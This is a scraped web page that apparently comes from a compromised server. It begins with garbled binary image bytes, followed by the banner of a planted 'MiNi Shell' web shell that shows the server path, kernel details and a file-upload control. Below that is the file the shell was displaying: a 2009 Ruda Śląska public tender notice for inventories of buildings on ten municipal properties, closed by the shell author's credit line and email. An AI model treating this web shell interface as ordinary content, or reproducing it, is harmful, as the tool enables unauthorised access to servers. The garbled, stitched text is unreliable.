JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090807/129843-N-2009.html

<p class="kh_header"><b>Ruda Śląska: Wykonanie inwentaryzacji obiektów na potrzeby Wydziału Gospodarki Nieruchomościami</b><br>
<b>Numer ogłoszenia: 129843 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Ruda Śląska , Plac Jana Pawła II 6, 41-709 Ruda Śląska, woj. śląskie, tel. 032 2486281 do 9; 2449094, faks 032 248 7348.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie inwentaryzacji obiektów na potrzeby Wydziału Gospodarki Nieruchomościami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania w trybie przetargu nieograniczonego jest sporządzenie inwentaryzacji obiektów. Szczegółowy opis przedmiotu zamówienia zawiera Specyfikacja Istotnych Warunków Zamówienia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają taki obowiązek oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy. 2. Posiadają niezbędną wiedzę i doświadczenie, oraz dysponują lub będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia: a) Wykonawca musi wykazać, iż w ostatnich 3 latach przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonywał minimum 3 usługi polegające na inwentaryzacji budynku/ów; b) Wykonawca musi wykazać, iż dysponuje lub będzie dysponował osobami do wykonania niniejszego zamówienia, tj. przynajmniej 1 osobą posiadającą uprawnienia budowlane                     o specjalności konstrukcyjno-budowlanej lub architektoniczne. 3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy. 2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej. 3. wykaz wykonanych inwentaryzacji budowlanych w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania o udzielnie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. 4. dokumenty -  referencje potwierdzające, że dostawy o których wyżej mowa, zostały wykonane należycie. 5. wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. 6. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował. 7.  uprawnienia budowlane o specjalności konstrukcyjno-budowlanej lub architektoniczne oraz aktualne zaświadczenia o przynależności do właściwego samorządu zawodowego wraz z informacją o opłaceniu obowiązkowych składek od odpowiedzialności cywilnej. 8. oświadczenie o spełnianiu warunku z art. 22 ust. 1 pkt 3 ustawy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rudaslaska.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ruda Śląska, Wydział Zamówień Publicznych ( pokój 309), pl Jana Pawła II nr 6, 41-709 Ruda Śląska..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 09:30, miejsce: Urząd Miasta Ruda Śląska, Wydział Zamówień Publicznych ( pokój 309), pl Jana Pawła II nr 6, 41-709 Ruda Śląska..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Władysława Broniewskiego 8, działka: 3155/555                o pow. 1250 m2 , k.m.3, obręb Bielszowice, KW 5388;.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania w trybie przetargu nieograniczonego jest sporządzenie inwentaryzacji obiektów położonych na nieruchomości przy ul. Władysława Broniewskiego 8, działka: 3155/555                o pow. 1250 m2 , k.m.3, obręb Bielszowice, KW 5388;
Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej (Rodzinny Dom Dziecka nr 1);
Uwagi: we wniosku o użyczenia budynku z 22 maja 2006 r. wymieniony został dwukondygnacyjny budynek o powierzchni zabudowy 110 m2 i o powierzchni użytkowej  306,94 m2,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sporządzenie inwentaryzacji obiektów położonych na nieruchomości przy ul. Ks. Pawła Lexa 3, działki: 493/107 o pow. 2608 m2, k.m.1, obręb Halemba, KW 20747, 1404/107 o pow. 1639 m2, k.m.1, obręb Halemba, KW 7679, 2133/107 o pow. 602 m2, k.m.1, obręb Halemba, KW 7785..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie inwentaryzacji obiektów położonych na nieruchomości przy ul. Ks. Pawła Lexa 3, działki: 493/107 o pow. 2608 m2, k.m.1, obręb Halemba, KW 20747, 1404/107 o pow. 1639 m2, k.m.1, obręb Halemba, KW 7679, 2133/107 o pow. 602 m2, k.m.1, obręb Halemba, KW 7785.
Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej (Szkoła Podstawowa nr 24);
Uwagi: we wniosku o trwały zarząd z 7 stycznia 2008 r. brak informacji o powierzchni zabudowy, powierzchni użytkowej i kubaturze położonych tam budynków..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Leśnej 18, działka; 1033/25 o pow. 589 m2, k.m.1, obręb Stara Kuźnia, KW 18000.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie inwentaryzacji obiektów położonych na nieruchomości przy ul. Leśnej 18, działka; 1033/25 o pow. 589 m2, k.m.1, obręb Stara Kuźnia, KW 18000.
Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej (Rodzinny Dom Dziecka nr 2).
Uwagi: we wniosku o użyczenia budynku z 22 maja 2006 r. wymieniony został dwukondygnacyjny budynek o powierzchni zabudowy 110 m2 i o powierzchni użytkowej              205 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. 11 Listopada 15, działki: 1786/36 o pow. 4231 m2, 1788/36 o pow. 654 m2, k.m.1, obręb: Bykowina, KW 8..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie inwentaryzacji obiektów położonych na nieruchomości przy ul. 11 Listopada 15, działki: 1786/36 o pow. 4231 m2, 1788/36 o pow. 654 m2, k.m.1, obręb: Bykowina, KW 8.
Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej (Szkoła Podstawowa nr 23).
Uwagi: we wniosku o trwały zarząd z 18 sierpnia 2006 r. wymieniony został budynek                            o powierzchni użytkowej 1897,2 m2 i kubaturze  10925,6 m3;w inwentaryzacji należy ująć również niezagospodarowany budynek byłej harcówki o powierzchni użytkowej 628 m2 i kubaturze 3586 m3..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Bytomskiej 13 oraz przy ul. Bytomskiej 15, działki: 2636/276 o pow. 2643 m2, 2644/309 o pow. 183 m2, k.m.1, obręb Orzegów , KW 16140; 1020/285  o pow. 880 m2, 2645/309 o pow. 50295 m2, k.m.1, obręb: Orzegów, KW 5367..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie inwentaryzacji obiektów położonych na nieruchomości przy ul. Bytomskiej 13 oraz przy ul. Bytomskiej 15, działki: 2636/276 o pow. 2643 m2, 2644/309 o pow. 183 m2, k.m.1, obręb Orzegów , KW 16140; 1020/285  o pow. 880 m2, 2645/309 o pow. 50295 m2, k.m.1, obręb: Orzegów, KW 5367.
Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej (Miejski Ośrodek Sportu i Rekreacji).
Uwagi: nieruchomość położona przy ul. Bytomskiej 13 i ul. Bytomskiej 15 zabudowana została: budynkiem hali sportowej o powierzchni zabudowy: 895,83 m2, powierzchni użytkowej: 944 m2                     i kubaturze 5400m3, boiskiem sportowym z trybunami; budynkiem gospodarczym                              o powierzchni zabudowy: 322,5 m2, powierzchni użytkowej: 285,2 m2 i kubaturze: 855,6 m3, budynkiem garażu: powierzchnia zabudowy: 43,31 m2, lodowiskiem sezonowym o wymiarach 30 x 60 m (latem- korty tenisowe)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sporządzenie inwentaryzacji obiektów położonych na nieruchomości przy ul. Bytomskiej 45, działki: 173 o pow. 2100 m2, 1107/174 o pow. 1847 m2 , k.m.1, obręb  Orzegów, KW 10895; 810/178 o pow. 138 m2, k.m.1, obręb Orzegów , KW T8 K247O; 1764/178 o pow. 523 m2, k.m.1, obręb Orzegów, KW T5 K141 O..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Bytomskiej 45, działki: 173 o pow. 2100 m2, 1107/174 o pow. 1847 m2 , k.m.1, obręb  Orzegów, KW 10895; 810/178 o pow. 138 m2, k.m.1, obręb Orzegów , KW T8 K247O; 1764/178 o pow. 523 m2, k.m.1, obręb Orzegów, KW T5 K141 O.
Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej (Szkoła Podstawowa nr 36).
Uwagi: we wniosku o trwały zarząd z 28 sierpnia 2007 r. wymieniony został jeden budynek                          o powierzchni użytkowej 1050 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Wita Stwosza 1 działki 264 o pow. 1742 m2, 265 o pow. 1716 m2, 276 o pow. 402 m2, k.m.3, obręb Bykowina, KW 20553..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Wita Stwosza 1 działki 264 o pow. 1742 m2, 265 o pow. 1716 m2, 276 o pow. 402 m2, k.m.3, obręb Bykowina, KW 20553.
Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej ( Ośrodek Adaptacyjny dla Dzieci Niepełnoprawnych)
Uwagi: we wniosku o trwały zarząd z dnia 12.04.2007 r. wymienione zostały: budynek o powierzchni użytkowej 966,3 m2 i kubaturze 4039 m3, budynek o powierzchni użytkowej               203,8 m2 i kubaturze 795 m3..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Wiktora Bujoczka 2, działki: 226 o pow. 1870 m2 , k.m.8, obręb Ruda, KW 19673; 810/92 o pow. 772 m2, 1110/92 o pow. 1200 m2, k.m.8, obręb Ruda, KW T11 K475; 391/101 o pow. 2737 m2, k.m.8, obręb Ruda, KW 19674; 812/92 o pow. 1273 m2, k.m.8 obręb Ruda, KW 177 Z, 808/93 o pow. 451 m2, k.m.8, obręb Ruda, KW T8 K337..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Wiktora Bujoczka 2, działki: 226 o pow. 1870 m2 , k.m.8, obręb Ruda, KW 19673; 810/92 o pow. 772 m2, 1110/92 o pow. 1200 m2, k.m.8, obręb Ruda, KW T11 K475; 391/101 o pow. 2737 m2, k.m.8, obręb Ruda, KW 19674; 812/92 o pow. 1273 m2, k.m.8 obręb Ruda, KW 177 Z, 808/93 o pow. 451 m2, k.m.8, obręb Ruda, KW T8 K337.Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej (Zespół Szkół Ponadgimnazjalnych Specjalnych nr 7).
Uwagi: we wniosku o trwały zarząd z 22 kwietnia 2005 r. wymieniony został budynek szkoły            o powierzchni użytkowej 922 m2, budynek Sali gimnastycznej o powierzchni użytkowej 273 m2 oraz budynek biblioteki o powierzchni użytkowej 76 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Energetyków 9 (działki: 564/25 o pow. 310 m2, k.m.1, obręb: Stara Kuźnia, 565/25 o pow. 324 m2, 992/3 o pow. 3713 m2, KW 22077..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sporządzenie inwentaryzacji:
obiektów położonych na nieruchomości przy ul. Energetyków 9 (działki: 564/25 o pow. 310 m2, k.m.1, obręb: Stara Kuźnia, 565/25 o pow. 324 m2, 992/3 o pow. 3713 m2, KW 22077.
Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej (Miejskie Przedszkole nr 24)
Uwagi: we wniosku o trwały zarząd wymieniony został jeden budynek o pow. użytkowej 873 m2                               i kubaturze 3516 m3..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> sporządzenie inwentaryzacji: obiektów położonych na nieruchomości przy ul. Ks. Ludwika Tunkla 147, działka: 11                        o pow. 8182 m2, k.m.5, obręb: Kochłowice, KW 10698;.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sporządzenie inwentaryzacji: obiektów położonych na nieruchomości przy ul. Ks. Ludwika Tunkla 147, działka: 11                        o pow. 8182 m2, k.m.5, obręb: Kochłowice, KW 10698;
Cel zamówienia: planowane ustanowienie trwałego zarządu dla ww. nieruchomości na rzecz samorządowej jednostki organizacyjnej (Centrum Kształcenia Praktycznego i Doskonalenia Zawodowego ).
Uwagi: we wniosku o trwały zarząd z 19 lutego 2007 r. wymieniony został jeden budynek o pow. użytkowej 1907 m2 i kubaturze 11386 m3..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.53.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com